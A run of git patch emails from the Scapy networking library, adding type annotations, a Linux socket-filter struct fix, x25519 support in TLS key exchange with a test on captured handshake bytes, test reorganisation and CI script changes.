self._supersession: self._supersession.prn = f else: @@ -54,18 +77,21 @@ def prn(self, f): @property def count(self): + # type: () -> int if self._supersession: return self._supersession.count else: return self.__count def toPacketList(self): + # type: () -> PacketList if self._supersession: return PacketList(self._supersession.lst, "Sniffed") else: return PacketList(self.lst, "Sniffed") def on_packet_received(self, pkt): + # type: (Optional[Packet]) -> None """DEV: entry point. Will be called by sniff() for each received packet (that passes the filters). """ @@ -92,10 +118,12 @@ class IPSession(DefaultSession): """ def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None DefaultSession.__init__(self, *args, **kwargs) - self.fragments = defaultdict(list) + self.fragments = defaultdict(list) # type: DefaultDict[Tuple[Any, ...], List[Packet]] # noqa: E501 def _ip_process_packet(self, packet): + # type: (Packet) -> Optional[Packet] from scapy.layers.inet import _defrag_list, IP if IP not in packet: return packet @@ -108,8 +136,8 @@ def _ip_process_packet(self, packet): try: if self.fragments[uniq][0].frag == 0: # Has first fragment (otherwise ignore) - defrag, missfrag = [], [] - _defrag_list(self.fragments[uniq], defrag, missfrag) + defrag = [] # type: List[Packet] + _defrag_list(self.fragments[uniq], defrag, []) defragmented_packet = defrag[0] defragmented_packet = defragmented_packet.__class__( raw(defragmented_packet) @@ -117,12 +145,18 @@ def _ip_process_packet(self, packet): return defragmented_packet finally: del self.fragments[uniq] + return None else: return packet def on_packet_received(self, pkt): - pkt = self._ip_process_packet(pkt) - DefaultSession.on_packet_received(self, pkt) + # type: (Optional[Packet]) -> None + if not pkt: + return None + DefaultSession.on_packet_received( + self, + self._ip_process_packet(pkt) + ) class StringBuffer(object): @@ -137,11 +171,13 @@ class StringBuffer(object): zeros. """ def __init__(self): + # type: () -> None self.content = bytearray(b"") self.content_len = 0 - self.incomplete = [] + self.incomplete = [] # type: List[Tuple[int, int]] def append(self, data, seq): + # type: (bytes, int) -> None data_len = len(data) seq = seq - 1 if seq + data_len > self.content_len: @@ -154,26 +190,34 @@ def append(self, data, seq): # for ifrag in self.incomplete: # if [???]: # self.incomplete.remove([???]) - memoryview(self.content)[seq:seq + data_len] = data + memoryview(self.content)[seq:seq + data_len] = data # type: ignore def full(self): + # type: () -> bool # Should only be true when all missing data was filled up, # (or there never was missing data) return True # XXX def clear(self): - self.__init__() + # type: () -> None + self.__init__() # type: ignore def __bool__(self): + # type: () -> bool return bool(self.content_len) __nonzero__ = __bool__ def __len__(self): + # type: () -> int return self.content_len def __bytes__(self): + # type: () -> bytes return bytes(self.content) - __str__ = __bytes__ + + def __str__(self): + # type: () -> str + return cast(str, self.__bytes__()) class TCPSession(IPSession): @@ -206,19 +250,21 @@ def tcp_reassemble(cls, data, metadata): '{IP:%IP.dst%}{IPv6:%IPv6.dst%}:%r,TCP.dport%') def __init__(self, app=False, *args, **kwargs): + # type: (bool, *Any, **Any) -> None super(TCPSession, self).__init__(*args, **kwargs) self.app = app if app: self.data = b"" - self.metadata = {} + self.metadata = {} # type: Dict[str, Any] else: # The StringBuffer() is used to build a global # string from fragments and their seq nulber self.tcp_frags = defaultdict( lambda: (StringBuffer(), {}) - ) + ) # type: DefaultDict[str, Tuple[StringBuffer, Dict[str, Any]]] def _process_packet(self, pkt): + # type: (Packet) -> Optional[Packet] """Process each packet: matches the TCP seq/ack numbers to follow the TCP streams, and orders the fragments. """ @@ -235,7 +281,7 @@ def _process_packet(self, pkt): self.data = b"" self.metadata = {} return pkt - return + return None from scapy.layers.inet import IP, TCP if not pkt or TCP not in pkt: @@ -279,7 +325,7 @@ def _process_packet(self, pkt): metadata["tcp_psh"] = True # XXX TODO: check that no empty space is missing in the buffer. # XXX Currently, if a TCP fragment was missing, we won't notice it. - packet = None + packet = None # type: Optional[Packet] if data.full(): # Reassemble using all previous packets packet = tcp_reassemble(bytes(data), metadata) @@ -293,14 +339,20 @@ def _process_packet(self, pkt): pkt[IP].len = None pkt[IP].chksum = None return pkt / packet + return None def on_packet_received(self, pkt): + # type: (Optional[Packet]) -> None """Hook to the Sessions API: entry point of the dissection. This will defragment IP if necessary, then process to TCP reassembly. """ + if not pkt: + return None # First, defragment IP if necessary pkt = self._ip_process_packet(pkt) + if not pkt: + return None # Now handle TCP reassembly pkt = self._process_packet(pkt) DefaultSession.on_packet_received(self, pkt) From 474eb1f6930601e444227445f9e315b35c06a996 Mon Sep 17 00:00:00 2001 From: Ilya Leoshkevich Date: Mon, 2 Nov 2020 13:20:41 +0100 Subject: [PATCH 0368/1632] Use sock_fprog instead of bpf_program on Linux sock_fprog is different from bpf_program in that its length field is ushort instead of int. This results in a different layout on big-endian machines. Fix by defining sock_fprog and copying field values from bpf_program. In theory sock_filter and bpf_insn could be affected too, but in practice they are the same. Signed-off-by: Ilya Leoshkevich --- scapy/arch/common.py | 8 -------- scapy/arch/linux.py | 12 ++++++++++++ scapy/libs/structures.py | 6 ++++++ 3 files changed, 18 insertions(+), 8 deletions(-) diff --git a/scapy/arch/common.py b/scapy/arch/common.py index d44d43d156d..14d5e6b43a8 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -10,7 +10,6 @@ import ctypes import socket import struct -import sys import time from scapy.consts import WINDOWS from scapy.config import conf @@ -154,11 +153,4 @@ def compile_filter(filter_exp, iface=None, linktype=None, raise Scapy_Exception( "Failed to compile filter expression %s (%s)" % (filter_exp, ret) ) - if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): - # PyPy < 7.3.2 has a broken behavior - # https://foss.heptapod.net/pypy/pypy/-/issues/3298 - return struct.pack( - 'HL', - bpf.bf_len, ctypes.addressof(bpf.bf_insns.contents) - ) return bpf diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index b084dd9ba90..a7293b6b94d 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -11,11 +11,13 @@ import array +import ctypes from fcntl import ioctl import os from select import select import socket import struct +import sys import time import subprocess @@ -37,6 +39,7 @@ ) from scapy.interfaces import IFACES, InterfaceProvider, NetworkInterface, \ network_name +from scapy.libs.structures import sock_fprog from scapy.packet import Packet, Padding from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket @@ -143,6 +146,15 @@ def attach_filter(sock, bpf_filter, iface): :param iface: the interface used to compile """ bp = compile_filter(bpf_filter, iface) + if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): + # PyPy < 7.3.2 has a broken behavior + # https://foss.heptapod.net/pypy/pypy/-/issues/3298 + bp = struct.pack( + 'HL', + bp.bf_len, ctypes.addressof(bp.bf_insns.contents) + ) + else: + bp = sock_fprog(bp.bf_len, bp.bf_insns) sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, bp) diff --git a/scapy/libs/structures.py b/scapy/libs/structures.py index af5e1cd0fc0..2abbca4cc50 100644 --- a/scapy/libs/structures.py +++ b/scapy/libs/structures.py @@ -21,3 +21,9 @@ class bpf_program(ctypes.Structure): """"Structure for BIOCSETF""" _fields_ = [('bf_len', ctypes.c_int), ('bf_insns', ctypes.POINTER(bpf_insn))] + + +class sock_fprog(ctypes.Structure): + """"Structure for SO_ATTACH_FILTER""" + _fields_ = [('len', ctypes.c_ushort), + ('filter', ctypes.POINTER(bpf_insn))] From 77c720b1c29b32054551dbb9b329bc0a69e14542 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 24 Oct 2020 23:01:29 +0200 Subject: [PATCH 0369/1632] Fix show() padding on colored themes --- scapy/packet.py | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index e6a00ab107f..11dbd56f2b3 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1425,7 +1425,8 @@ def _show_or_dump(self, vcol = ct.field_value fvalue = self.getfieldval(f.name) if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)): # noqa: E501 - s += "%s \\%-10s\\\n" % (label_lvl + lvl, ncol(f.name)) + pad = max(0, 10 - len(f.name)) * " " + s += "%s \\%s%s\\\n" % (label_lvl + lvl, ncol(f.name), pad) fvalue_gen = SetGen( fvalue, _iterpacket=0 @@ -1433,9 +1434,11 @@ def _show_or_dump(self, for fvalue in fvalue_gen: s += fvalue._show_or_dump(dump=dump, indent=indent, label_lvl=label_lvl + lvl + " |", first_call=False) # noqa: E501 else: - begn = "%s %-10s%s " % (label_lvl + lvl, - ncol(f.name), - ct.punct("="),) + pad = max(0, 10 - len(f.name)) * " " + begn = "%s %s%s%s " % (label_lvl + lvl, + ncol(f.name), + pad, + ct.punct("="),) reprval = f.i2repr(self, fvalue) if isinstance(reprval, str): reprval = reprval.replace("\n", "\n" + " " * (len(label_lvl) + # noqa: E501 From 755fb6c600e6b8c30dbcf39c0214b32f9f5f8cfc Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 31 Oct 2020 16:52:33 +0100 Subject: [PATCH 0370/1632] Exit if a uts file is malformed --- scapy/tools/UTscapy.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 9a66e9ddfbb..c8a208b362f 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -839,7 +839,7 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC except ValueError as ex: print(theme.red("Error while parsing '%s': '%s'" % (TESTFILE.name, ex)), file=sys.stderr) - sys.exit(0) + sys.exit(1) # Report parameters if PREEXEC: From be4fde45ca5e82e7157fd7d1978252e8c19f58de Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 31 Oct 2020 16:53:04 +0100 Subject: [PATCH 0371/1632] Remove incorrect import --- test/contrib/lldp.uts | 1 - 1 file changed, 1 deletion(-) diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index f77f22dc426..02e84ad77f2 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -1,4 +1,3 @@ -from enum import test % LLDP test campaign # From 9c82e5fb10bd5d90da4fac8102935773c07708fc Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 31 Oct 2020 16:53:43 +0100 Subject: [PATCH 0372/1632] Fix uts syntax error --- test/contrib/bgp.uts | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index 004548c0f62..9ea83ae0742 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -1,7 +1,9 @@ #################################### bgp.py ################################## % Regression tests for the bgp module -# Default configuration : OLD speaker (see RFC 6793) ++ Default configuration + += OLD speaker (see RFC 6793) bgp_module_conf.use_2_bytes_asn = True ################################ BGPNLRI_IPv4 ################################ From bf4a58d66c0c3077d90559d800649d010168c176 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 2 Nov 2020 16:43:07 +0100 Subject: [PATCH 0373/1632] Call metaclass in the correct order Co-authored-by: Gabriel --- scapy/contrib/bgp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 54fbba5b6bf..105791ad363 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -575,7 +575,7 @@ def __new__(cls, clsname, bases, attrs): return newclass -class _BGPCapability_metaclass(Packet_metaclass, _BGPCap_metaclass): +class _BGPCapability_metaclass(_BGPCap_metaclass, Packet_metaclass): pass From ee3829cfd206e926938666a821ff764fb0c6d2a3 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 30 Oct 2020 00:23:17 +0100 Subject: [PATCH 0374/1632] Support x25519 curve in ECDH --- scapy/layers/tls/automaton_cli.py | 2 +- scapy/layers/tls/keyexchange.py | 30 ++++++++++++++++++++++++------ test/tls.uts | 21 ++++++++++++++++++++- 3 files changed, 45 insertions(+), 8 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index dc3d70aa69b..df22151a3ba 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -97,7 +97,7 @@ class TLSClientAutomaton(_TLSAutomaton): the handshake, should the server ask for client authentication. :param client_hello: may hold a TLSClientHello or SSLv2ClientHello to be sent to the server. This is particularly useful for extensions - tweaking. + tweaking. If not set, a default is populated accordingly. :param version: is a quicker way to advertise a protocol version ("sslv2", "tls1", "tls12", etc.) It may be overridden by the previous 'client_hello'. diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 4bc43b009bf..6c6f7fc9eeb 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -35,6 +35,10 @@ if conf.crypto_valid: from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import dh, ec + from cryptography.hazmat.primitives import serialization +if conf.crypto_valid_advanced: + from cryptography.hazmat.primitives.asymmetric import x25519 + from cryptography.hazmat.primitives.asymmetric import x448 ############################################################################### @@ -800,15 +804,29 @@ def fill_missing(self): s.client_kx_privkey = _tls_named_groups_generate( s.client_kx_ecdh_params ) + # ecdh_Yc follows ECPoint.point format as defined in + # https://tools.ietf.org/html/rfc8422#section-5.4 pubkey = s.client_kx_privkey.public_key() - x = pubkey.public_numbers().x - y = pubkey.public_numbers().y - self.ecdh_Yc = (b"\x04" + - pkcs_i2osp(x, pubkey.key_size // 8) + - pkcs_i2osp(y, pubkey.key_size // 8)) + if isinstance(pubkey, (x25519.X25519PublicKey, + x448.X448PublicKey)): + self.ecdh_Yc = pubkey.public_bytes( + serialization.Encoding.Raw, + serialization.PublicFormat.Raw + ) + if s.client_kx_privkey and s.server_kx_pubkey: + pms = s.client_kx_privkey.exchange(s.server_kx_pubkey) + else: + # uncompressed format of an elliptic curve point + x = pubkey.public_numbers().x + y = pubkey.public_numbers().y + self.ecdh_Yc = (b"\x04" + + pkcs_i2osp(x, pubkey.key_size // 8) + + pkcs_i2osp(y, pubkey.key_size // 8)) + if s.client_kx_privkey and s.server_kx_pubkey: + pms = s.client_kx_privkey.exchange(ec.ECDH(), + s.server_kx_pubkey) if s.client_kx_privkey and s.server_kx_pubkey: - pms = s.client_kx_privkey.exchange(ec.ECDH(), s.server_kx_pubkey) s.pre_master_secret = pms if not s.extms or s.session_hash: s.compute_ms_and_derive_keys() diff --git a/test/tls.uts b/test/tls.uts index 4a583b715af..56a8ad7e16b 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -979,8 +979,27 @@ assert(rec_fin.mac == b'\xecguD\xa8\x87$<7+\n\x94\x1e9\x96\xfa') assert(isinstance(rec_fin.msg[0], _TLSEncryptedContent)) rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' += Building x25519 ecdh_Yc + +from scapy.layers.tls.record import TLS +from scapy.layers.tls.handshake import TLSClientKeyExchange + +cli_hello = hex_bytes('160303008f0100008b0303000027104268d53e923ce05aa04cb21b8fe33aed93266c00bd1f13ea6a6dad24000018c02cc02bc030c02fc024c023c028c027c00ac009c014c0130100004a00000013001100000e7777772e676f6f676c652e636f6d000500050100000000000a00080006001d00170018000b00020100000d00140012040105010201040305030203020206010603') +ser_hello = hex_bytes('16030300520200004e03035f9b52e4206fdc2410d1d482905c9b45a204641d9d856afb444f574e4752440120c4d1479e11a26edf0dbcb07e7a5f7d41c3d7b500015ff8c1ceed473bf457b193c02b000006000b0002010016030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d205232311330110603') +ser_cert = hex_bytes('16030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3137303631353030303034325a170d3231313231353030303034325a3042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f3130820122300d06092a864886f70d01010105000382010f003082010a0282010100d018cf45d48bcdd39ce440ef7eb4dd69211bc9cf3c8e4c75b90f3119843d9e3c29ef500d10936f0580809f2aa0bd124b02e13d9f581624fe309f0b747755931d4bf74de1928210f651ac0cc3b222940f346b981049e70b9d8339dd20c61c2defd1186165e7238320a82312ffd2247fd42fe7446a5b4dd75066b0af9e426305fbe01cc46361af9f6a33ff6297bd48d9d37c1467dc75dc2e69e8f86d7869d0b71005b8f131c23b24fd1a3374f823e0ec6b198a16c6e3cda4cd0bdbb3a4596038883bad1db9c68ca7531bfcbcd9a4abbcdd3c61d7931598ee81bd8fe264472040064ed7ac97e8b9c05912a1492523e4ed70342ca5b4637cf9a33d83d1cd6d24ac070203010001a38201333082012f300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100301d0603551d0e0416041498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b301f0603551d230418301680149be20757671c1ec06a06de59b49a2ddfdc19862e303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e706b692e676f6f672f6773723230320603551d1f042b30293027a025a0238621687474703a2f2f63726c2e706b692e676f6f672f677372322f677372322e63726c303f0603551d20043830363034060667810c010202302a302806082b06010505070201161c68747470733a2f2f706b692e676f6f672f7265706f7369746f72792f300d06092a864886f70d01010b050003820101001a803e3679fbf32ea946377d5e541635aec74e0899febdd13469265266073d0aba49cb62f4f11a8efc114f68964c742bd367deb2a3aa058d844d4c20650fa596da0d16f86c3bdb6f0423886b3a6cc160bd689f718eee2d583407f0d554e98659fd7b5e0d2194f58cc9a8f8d8f2adcc0f1af39aa7a90427f9a3c9b0ff02786b61bac7352be856fa4fc31c0cedb63cb44beaedcce13cecdc0d8cd63e9bca42588bcc16211740bca2d666efdac4155bcd89aa9b0926e732d20d6e6720025b10b090099c0c1f9eadd83beaa1fc6ce8105c085219512a71bbac7ab5dd15ed2bc9082a2c8ab4a621ab63ffd7524950d089b7adf2affb50ae2fe1950df346ad9d9cf5ca') + +r1 = TLS(cli_hello) +r2 = TLS(ser_hello, tls_session=r1.tls_session.mirror()) +r3 = TLS(ser_cert, tls_session=r2.tls_session) + +s = r3.tls_session.mirror() +s.client_kx_ecdh_params = 29 +pkt = TLSClientKeyExchange(tls_session=s) +bytes(pkt) +pkt.exchkeys.fill_missing() +assert len(pkt.exchkeys.ecdh_Yc) == 32 + = Reading TLS test session - Extended master secret -~ test # See https://github.com/secdev/scapy/issues/2784 From 1b8a496cd81e671b385b5f5307db8dc6fa79910a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 31 Oct 2020 18:41:51 +0100 Subject: [PATCH 0375/1632] Standalone TFTP unit tests Co-authored-by: Gabriel Potter Co-authored-by: Phil --- test/regression.uts | 14 -------------- test/scapy/layers/tftp.uts | 16 ++++++++++++++++ 2 files changed, 16 insertions(+), 14 deletions(-) create mode 100644 test/scapy/layers/tftp.uts diff --git a/test/regression.uts b/test/regression.uts index a39f1ce232e..9f6655f62ec 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1218,20 +1218,6 @@ r = raw(a) r assert(r == b'5\x00\x00\x14\x00\x01\x00\x00 \x00\xac\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01') - -############ -############ -+ TFTP tests - -= TFTP Options -x=IP()/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) -assert( raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' ) -y=IP(raw(x)) -y[TFTP_Option].oname -y[TFTP_Option:2].oname -assert(len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize") - - ############ ############ + SNMP tests diff --git a/test/scapy/layers/tftp.uts b/test/scapy/layers/tftp.uts new file mode 100644 index 00000000000..d9119ae9d9e --- /dev/null +++ b/test/scapy/layers/tftp.uts @@ -0,0 +1,16 @@ +% TFTP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ TFTP tests + += TFTP Options +x=IP()/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) +assert( raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' ) +y=IP(raw(x)) +y[TFTP_Option].oname +y[TFTP_Option:2].oname +assert(len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize") From d6f0fd8283f1bef90d570912caad5a8f8b476841 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 25 Oct 2020 16:10:57 +0100 Subject: [PATCH 0376/1632] Unit tests: support for plain ./run_tests --- .config/ci/test.sh | 23 ++++++++++---- doc/scapy/development.rst | 9 ++++++ test/configs/windows.utsc | 4 ++- test/configs/windows2.utsc | 38 ----------------------- test/contrib/automotive/ccp.uts | 1 + test/contrib/automotive/ecu_am.uts | 1 + test/contrib/automotive/gm/gmlanutils.uts | 1 + test/contrib/automotive/obd/scanner.uts | 1 + test/contrib/automotive/uds_utils.uts | 1 + test/contrib/isotp.uts | 1 + test/regression.uts | 3 +- test/run_tests | 38 +++++++++++++++++++++++ test/tls/tests_tls_netaccess.uts | 8 +++++ tox.ini | 5 +-- 14 files changed, 86 insertions(+), 48 deletions(-) delete mode 100644 test/configs/windows2.utsc diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 206b093799d..ec8ebe63274 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -10,18 +10,23 @@ if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then # Linux OSTOX="linux" - UT_FLAGS=" -K tshark" # TODO: also test as root ? - # check vcan - sudo modprobe -n -v vcan - if [[ $? -ne 0 ]] + UT_FLAGS+=" -K tshark" + if [ -z "$SIMPLE_TESTS" ] then - # The vcan module is currently unavailable on Travis-CI xenial builds + # check vcan + sudo modprobe -n -v vcan + if [[ $? -ne 0 ]] + then + # The vcan module is currently unavailable on Travis-CI xenial builds + UT_FLAGS+=" -K vcan_socket" + fi + else UT_FLAGS+=" -K vcan_socket" fi elif [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then OSTOX="osx" - UT_FLAGS=" -K tcpdump" + UT_FLAGS+=" -K tcpdump" fi # pypy @@ -70,6 +75,12 @@ echo TOXENV=$TOXENV # Launch Scapy unit tests tox -- ${UT_FLAGS} || exit 1 +# Stop if NO_BASH_TESTS is set +if [ ! -z "$SIMPLE_TESTS" ] +then + exit $? +fi + # Start Scapy in interactive mode TEMPFILE=$(mktemp) cat < "${TEMPFILE}" diff --git a/doc/scapy/development.rst b/doc/scapy/development.rst index 657f6698d04..1d590d3ad65 100644 --- a/doc/scapy/development.rst +++ b/doc/scapy/development.rst @@ -254,6 +254,15 @@ all Scapy unit tests automatically without any external dependency:: tox -- -K vcan_socket -K tcpdump -K tshark -K nmap -K manufdb -K crypto +.. note:: This will trigger the unit tests on all available Python versions + unless you specify a `-e` option. See below + +For your convenience, and for package maintainers, we provide a util that +run tox on only a single (default Python) environment, again with no external +dependencies:: + + ./test/run_tests + VIM syntax highlighting for .uts files -------------------------------------- diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 21a3b59f481..7b233d1fdb9 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -29,6 +29,8 @@ "require_gui", "open_ssl_client", "vcan_socket", - "ipv6" + "ipv6", + "brotli", + "zstd" ] } diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc deleted file mode 100644 index 5650a98dfe7..00000000000 --- a/test/configs/windows2.utsc +++ /dev/null @@ -1,38 +0,0 @@ -{ - "testfiles": [ - "*.uts", - "scapy\\layers\\*.uts", - "test\\contrib\\automotive\\obd\\*.uts", - 